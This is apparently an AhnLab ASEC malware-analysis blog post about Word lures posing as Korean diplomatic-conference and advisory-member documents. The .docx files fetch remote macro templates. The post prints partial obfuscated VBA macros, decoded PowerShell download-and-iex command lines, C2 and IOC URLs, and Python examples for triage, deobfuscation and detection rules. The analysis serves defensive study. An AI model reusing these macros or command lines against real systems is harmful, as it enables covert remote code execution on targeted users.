Malicious Word Documents Pretending ‘Korea Association for Political and Diplomatic History’ and ‘Policy Advisory Member Profile’ Being Distributed

The ASEC analysis team has previously reported on two occasions (see the posts listed below) that malicious Word documents titled ‘Compensation Claim Form’ and ‘Summer Academic Conference Profile Template’ were being distributed. While monitoring for the same attack type, the team found that the creator of those documents distributed new Word documents in June and on July 1st.

Titles of the newly discovered malicious Word documents

  • The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx – Additional discovery in June
  • [Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx – Additional discovery on July 1st

Previous blog posts covering malicious Word documents of the same type

The file confirmed on July 1st is named ‘[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx.’ The .docx itself carries no macro: it contains an external template link, and when the document is opened Word follows that link to download a .dotm template that holds the macro.

Figure 1. External URL within ‘[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx’
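The external link is an OOXML relationship with TargetMode="External" (for a remote template, the attachedTemplate relationship in word/_rels/settings.xml.rels), so the lure can be triaged without opening it in Word. The following Python is an added example, not code from the ASEC post: it builds a constructed minimal .docx in memory that attaches a template from a placeholder URL (example.invalid stands in for the attacker's host), lists every external relationship, keeps only template targets that would be fetched over the network, and confirms that the package embeds no VBA project, which is why a plain "does it contain macros" check misses this lure. Note that the real template URLs in the IOC list use path segments that mimic the OOXML relationship namespace strings (…/Package/2006/relationships/ and …/officeDocument/2006/relationships/attachedTemplate/).

```python
import io
import re
import zipfile
from xml.etree import ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
# A target Word would fetch off the box: http(s) URL or UNC path. file:// to a
# local template (the normal Normal.dotm case) is External too, but not remote.
REMOTE_TARGET = re.compile(r"^(https?://|\\\\)", re.IGNORECASE)


def external_relationships(docx_bytes):
    """Return (rels_part, rel_type, target) for every External relationship in the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    found.append((name, rel.get("Type"), rel.get("Target")))
    return found


def remote_template_targets(docx_bytes):
    """Targets of attachedTemplate relationships that point off the local machine."""
    return [target for _, rtype, target in external_relationships(docx_bytes)
            if rtype == ATTACHED_TEMPLATE and target and REMOTE_TARGET.match(target)]


def has_vba_project(docx_bytes):
    """True if the package embeds a VBA project (a .docx never does; .docm/.dotm may)."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        return "word/vbaProject.bin" in pkg.namelist()


def build_docx(template_target):
    """Constructed minimal .docx (test fixture, not a real sample) whose settings part
    attaches a template through an External relationship."""
    settings_rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}" Target="{template_target}" TargetMode="External"/>'
        '</Relationships>'
    )
    settings = (
        '<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
        'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:attachedTemplate r:id="rId1"/></w:settings>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        pkg.writestr("word/settings.xml", settings)
        pkg.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host standing in for the attacker's .dotm server from the IOC list.
    lure = build_docx("http://example.invalid/Package/2006/relationships/InterKoreanSummit.dotm")
    print("remote templates:", remote_template_targets(lure))
    print("vba project embedded:", has_vba_project(lure))
```

The same scan applies to any .rels part in the package, so hyperlink, oleObject or frame relationships with an external target show up in external_relationships() as well; only remote_template_targets() narrows to the template case this post describes.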

The InterKoreanSummit.dotm file, which holds the macro that performs the actual malicious behavior, contains the following obfuscated code. The macro is similar to the one covered in the ASEC blog post of June 14th, Malware Disguised as Normal Excel and Word Documents.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Document_Open()
    eifhhdfasfiedf      ' stage 1: rebuild the PowerShell command and launch it
    aksjdkjaskf         ' stage 2: delete the temp file the script is read from
End Sub

Function eifhhdfasfiedf()
    Set djfeihfidkasljf = CreateObject("Shell.Application")
    ' Every string literal is padded with the junk token "tlsia"; Replace() strips it at run time.
    dfgdfjiejfjdshaj = "tlsiapowtlsiaertlsiastlsiahetlsialltlsia.etlsiatlsiaxtlsiae"   ' -> powershell.exe
    fjdjkasf = "tlsiajdsladkf"
    fjdjkasf = Left(fjdjkasf, 5)                                                        ' -> "tlsia"
    dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
    hdfksallasjkdlaf = "$atlsiatlsiatlsia='tlsiaC:tlsiatlsia\wtlsiatlsiaintlsiatlsiadotlsiatlsiawstlsiatlsia\ttlsiaetlsiamptlsia\DtlsiatlsiaMItlsia5tlsiaCtlsiaA0tlsia6.tlsiatlsiatmtlsiaptlsia'tlsiatlsia;tlsia"
    ' -> $a='C:\windows\temp\DMI5CA06.tmp';
    hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
… (omitted)
    aksfkjaskjfksnkf = "tlsiatlsia$tlsiactlsiatlsia;$tlsiadtlsia=[tlsiatlsiaIOtlsia.tlsiatlsiaFitlsiale]tlsiatlsia:tlsia:RtlsiatlsiaeatlsiadAtlsialtlsiatlsialTtlsiaetlsiaxttlsiatlsia($tlsiaatlsiatlsia)tlsia;tlsia$tlsiae=tlsiaietlsiatlsiax $tlsiad;tlsiaitlsiaetlsiax tlsia$tlsiae"
    ' -> $c;$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e
    aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
    ' The decoded fragments are concatenated into one PowerShell command line.
    skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf
    ' ShellExecute(file, args, dir, verb, vShow); vShow = 0 keeps the console window hidden.
    djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
End Function

Function aksjdkjaskf()
    Dim SngSec As Single
… (omitted)
    sakjfkalsjfkasjf = Replace(sakjfkalsjfkasjf, fjdjkasf, "")
    djfkasjfskaal = Left(sakjfkalsjfkasjf, 32)
    djfkasjfskaal = Right(djfkasjfskaal, 28)    ' 28 characters: C:\windows\temp\DMI5CA06.tmp
    If djfkasjfskaal = "" Then
    Else
        Kill djfkasjfskaal                      ' delete the temp file
    End If
End Function

Code 1. Part of macro code within InterKoreanSummit.dotm file

Attribute VB_Name = "NewMacros"

' Each Sub types a single character into the document or moves the cursor; the
' chain is driven through Application.Run calls between the Subs.
Sub djfksdalfjkasj()
    Selection.TypeText Text:="a"
End Sub

Sub ejdksaljfkalkf()
    Selection.TypeText Text:="b"
End Sub

Sub eijdklsafkasdk()
    Selection.TypeText Text:="c"
End Sub

Sub uehfsahdkajkas()
    Selection.TypeText Text:="d"
End Sub

… (omitted)

Sub euehfhafjhdjkafqka()
    Selection.TypeText Text:=""
    Application.Run MacroName:="Project.NewMacros.euirieafkjekjf"
    Application.Run MacroName:="Project.NewMacros.qjiejwfksjalksainuse"
    Application.Run MacroName:="Project.NewMacros.euirieafkjekjf"
    Selection.TypeText Text:="
… (omitted)
End Sub

Sub eijfkdjqjdfklafea()
    Selection.TypeText Text:="+"
End Sub

Sub efuehjsahfklkejklafe()
    Selection.TypeText Text:="{"
End Sub

… (omitted)

Sub qeuejsahfdasight()
    Selection.MoveRight Unit:=wdCharacter, Count:=1
End Sub

Sub idifdsakjflakdsagedown()
    Selection.MoveDown Unit:=wdScreen, Count:=1
End Sub

Code 2. Part of macro code within InterKoreanSummit.dotm file

When the macro runs, it launches a hidden powershell.exe that connects to the C2 (hxxp://ripzi.getenjoyment.net/le/eh.txt) to download an additional script. The script is written to C:\windows\temp\DMI5CA06.tmp, read back with [IO.File]::ReadAllText and executed with Invoke-Expression in two stages (the output of the first iex is itself passed to a second iex); the macro's second function then deletes the tmp file. The downloaded script has the same code as the one described in the June post “Malware Disguised as Normal Excel and Word Documents,” with the only difference being the C2 URL.

Figure 2. Malicious script found in C2
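The decoded command line gives a concrete detection surface: an Office host starting PowerShell, a script body read from disk and handed to Invoke-Expression, two chained iex calls, and a .tmp under C:\windows\temp. The Python below is an added example, not part of the ASEC post: it runs a small rule set over constructed process-creation events in Sysmon Event ID 1 field style (the events, their IDs and the benign command lines are made up; the suspicious one uses only the fragments decoded from Code 1, with the macro's omitted middle part left out). The parent-process rule assumes the Shell.Application object runs inside the VBA host, so WINWORD.EXE is the direct parent; the three content rules do not depend on that.

```python
import re

OFFICE_HOST = re.compile(r"\\(WINWORD|EXCEL|POWERPNT|OUTLOOK)\.EXE$", re.IGNORECASE)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.IGNORECASE)
IEX = re.compile(r"\b(iex|Invoke-Expression)\b", re.IGNORECASE)
READ_FILE = re.compile(r"\[(System\.)?IO\.File\]::ReadAll(Text|Bytes|Lines)\(", re.IGNORECASE)
TEMP_TMP = re.compile(r"[A-Z]:\\windows\\temp\\[^\s'\"]+\.tmp", re.IGNORECASE)

RULES = {
    # Office application directly starting PowerShell.
    "office_spawns_powershell": lambda e: bool(OFFICE_HOST.search(e["ParentImage"])
                                               and POWERSHELL.search(e["Image"])),
    # A file's contents are read and fed to Invoke-Expression.
    "iex_of_file_contents": lambda e: bool(READ_FILE.search(e["CommandLine"])
                                           and IEX.search(e["CommandLine"])),
    # The output of one iex is executed by a second iex (two-stage decode).
    "chained_iex": lambda e: len(IEX.findall(e["CommandLine"])) >= 2,
    # A .tmp under C:\windows\temp is referenced on the command line.
    "windows_temp_tmp_script": lambda e: bool(TEMP_TMP.search(e["CommandLine"])),
}


def matched_rules(event):
    """Names of the rules that fire for one process-creation event."""
    return [name for name, pred in RULES.items() if pred(event)]


def is_suspicious(event, threshold=2):
    """Alert when at least `threshold` rules fire; a lone Office->PowerShell is only a lead."""
    return len(matched_rules(event)) >= threshold


# Constructed sample events, not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Id": "A",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS,
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a='C:\windows\temp\DMI5CA06.tmp';$c;$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e'''},
    {"Id": "B",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": PS,
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-ChildItem C:\Users\user\Documents'''},
    {"Id": "C",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": PS,
     "CommandLine": r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -File C:\scripts\export.ps1'''},
]


def triage(events=SAMPLE_EVENTS):
    """(event id, fired rules) for every event that crosses the alert threshold."""
    return [(e["Id"], matched_rules(e)) for e in events if is_suspicious(e)]


if __name__ == "__main__":
    for event_id, rules in triage():
        print(event_id, rules)
```

Event C shows why the parent rule alone is weighted as a lead rather than an alert: a document-driven export script produces the same WINWORD.EXE to powershell.exe pair without any of the content indicators.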

Also in June, a malicious file of the same format was found being distributed under the title ‘The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx.’ The external URL in that file is as follows.

Figure 3. External URL within ‘The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx’

The Seminarfinal.dotm file downloaded from that URL contains a macro similar to the one in InterKoreanSummit.dotm described above. Two differences are visible in the excerpt: the junk token "tuwhn" is passed to Replace() directly instead of being derived with Left(), and Document_Open calls only the download stage. The following is part of the obfuscated macro code in Seminarfinal.dotm.

Private Sub Document_Open()
    eifhhdfasfiedf
End Sub

Function eifhhdfasfiedf()
    Set djfeihfidkasljf = CreateObject("Shell.Application")
    Dim dfgdfjiejfjdshaj As String
    Dim yhjhfjdhfdhfuesk(10) As String
    ' Junk token here is "tuwhn"; the command is assembled from an array of padded fragments.
    dfgdfjiejfjdshaj = "tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn"   ' -> powershell.exe
    dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, "tuwhn", "")
    yhjhfjdhfdhfuesk(0) = "tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn "
    ' -> [string]$a={(New-Object
    dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), "tuwhn", "")
… (omitted)
    dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(4), "tuwhn", "")
    yhjhfjdhfdhfuesk(5) = "etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn"   ' -> ex $b;iex $c
    dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), "tuwhn", "")
    djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, "", "open", 0   ' hidden window
End Function

Code 3. Part of macro code within Seminarfinal.dotm file

This macro likewise connects to its C2 (hxxp://likel.atwebpages.com/bu/ma.txt) to download an additional script, which is the same as the one hosted at hxxp://ripzi.getenjoyment.net/le/eh.txt described earlier.
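Both macros (Code 1 in InterKoreanSummit.dotm and Code 3 in Seminarfinal.dotm) use the same scheme: a five-character junk token is spliced into every string literal and Replace() removes it at run time, so the literals decode statically. The Python below is an added example, not code from the post or from the samples. It carries the literals shown on this page, recovers the Code 1 token exactly as the macro does (Left of the seed string, 5), and also infers a token from the literals alone as the most frequent 5-gram, which is what an analyst needs when the seed or the Replace() call sits in an omitted part. It then applies the macro's Left(…, 32) / Right(…, 28) slicing to the decoded $a assignment; the page omits the sakjfkalsjfkasjf literal that the macro actually slices, so using the $a assignment in its place is an assumption, one that the lengths 32 and 28 fit exactly (4 characters of "$a='" plus the 28-character path).

```python
from collections import Counter

# Obfuscated literals copied from the macros on this page. Each is the real
# string with a five-character junk token spliced in at arbitrary points.
CODE1_LITERALS = {  # InterKoreanSummit.dotm, token "tlsia"
    "dfgdfjiejfjdshaj": "tlsiapowtlsiaertlsiastlsiahetlsialltlsia.etlsiatlsiaxtlsiae",
    "hdfksallasjkdlaf": r"$atlsiatlsiatlsia='tlsiaC:tlsiatlsia\wtlsiatlsiaintlsiatlsiadotlsiatlsiawstlsiatlsia\ttlsiaetlsiamptlsia\DtlsiatlsiaMItlsia5tlsiaCtlsiaA0tlsia6.tlsiatlsiatmtlsiaptlsia'tlsiatlsia;tlsia",
    "aksfkjaskjfksnkf": "tlsiatlsia$tlsiactlsiatlsia;$tlsiadtlsia=[tlsiatlsiaIOtlsia.tlsiatlsiaFitlsiale]tlsiatlsia:tlsia:RtlsiatlsiaeatlsiadAtlsialtlsiatlsialTtlsiaetlsiaxttlsiatlsia($tlsiaatlsiatlsia)tlsia;tlsia$tlsiae=tlsiaietlsiatlsiax $tlsiad;tlsiaitlsiaetlsiax tlsia$tlsiae",
}
CODE3_LITERALS = {  # Seminarfinal.dotm, token "tuwhn"
    "dfgdfjiejfjdshaj": "tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn",
    "yhjhfjdhfdhfuesk_0": "tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn ",
    "yhjhfjdhfdhfuesk_5": "etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn",
}


def vba_left(s, n):
    """VBA Left(): first n characters."""
    return s[:n]


def vba_right(s, n):
    """VBA Right(): last n characters."""
    return s[-n:] if n > 0 else ""


def strip_junk(literal, token):
    """What the macro's Replace(literal, token, "") produces."""
    return literal.replace(token, "")


def infer_token(literals, length=5):
    """Most frequent substring of the given length across the literals.
    The junk token repeats far more often than any real fragment, so it wins."""
    counts = Counter()
    for lit in literals:
        for i in range(len(lit) - length + 1):
            counts[lit[i:i + length]] += 1
    return counts.most_common(1)[0][0]


def decode(literals, token):
    """Decode every literal of one macro with its junk token."""
    return {name: strip_junk(lit, token) for name, lit in literals.items()}


def kill_target(decoded_assignment):
    """The macro's Left(x, 32) then Right(x, 28): drops "$a='" and keeps the 28-char path."""
    return vba_right(vba_left(decoded_assignment, 32), 28)


if __name__ == "__main__":
    token1 = vba_left("tlsiajdsladkf", 5)        # how Code 1 derives its token
    assert token1 == infer_token(CODE1_LITERALS.values())
    for name, text in decode(CODE1_LITERALS, token1).items():
        print(f"Code 1 {name} -> {text}")
    print("Kill target ->", kill_target(decode(CODE1_LITERALS, token1)["hdfksallasjkdlaf"]))
    token3 = infer_token(CODE3_LITERALS.values())
    for name, text in decode(CODE3_LITERALS, token3).items():
        print(f"Code 3 {name} -> {text}")
```

Because the token is only ever removed, not transformed, decoding is a single replace per literal; the value of the script is in being able to recover the token without the seed and in checking the Left/Right arithmetic against the decoded strings rather than trusting the macro.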

All of the collected files have ‘Naeil_EnglishStart’ as the author (user name) in their document properties. Since this matches the author of the documents titled ‘[** Summer Academic Conference]_Profile Template.doc’ and ‘Compensation Claim Form’, the collected files were most likely created by the same attacker.

Figure 4. Document property of ‘[** Summer Academic Conference]_Solar Calendar.doc’

As shown above, malware targeting specific users is being actively distributed, and most of it appears to come from the same attacker, so users need to be cautious. Users must refrain from opening files and links attached to emails from unknown senders and from enabling macros. Note that the .docx lures themselves contain no macro; the macro only arrives when Word fetches the remote .dotm template, so the external template link in the document is the point to inspect or block.

AhnLab’s anti-malware product, V3, detects the targeted attack malicious word documents as shown below.

[File Detection]

  • Downloader/XML.External
  • Downloader/DOC.Generic

[IOC]

  • hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
  • hxxp://likel.atwebpages.com/officeDocument/2006/relationships/attachedTemplate/Seminarfinal.dotm
  • hxxp://ripzi.getenjoyment.net/le/eh.txt
  • hxxp://likel.atwebpages.com/bu/ma.txt

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.


Article Link: Malicious Word Documents Pretending 'Korea Association for Political and Diplomatic History' and 'Policy Advisory Member Profile' Being Distributed - ASEC BLOG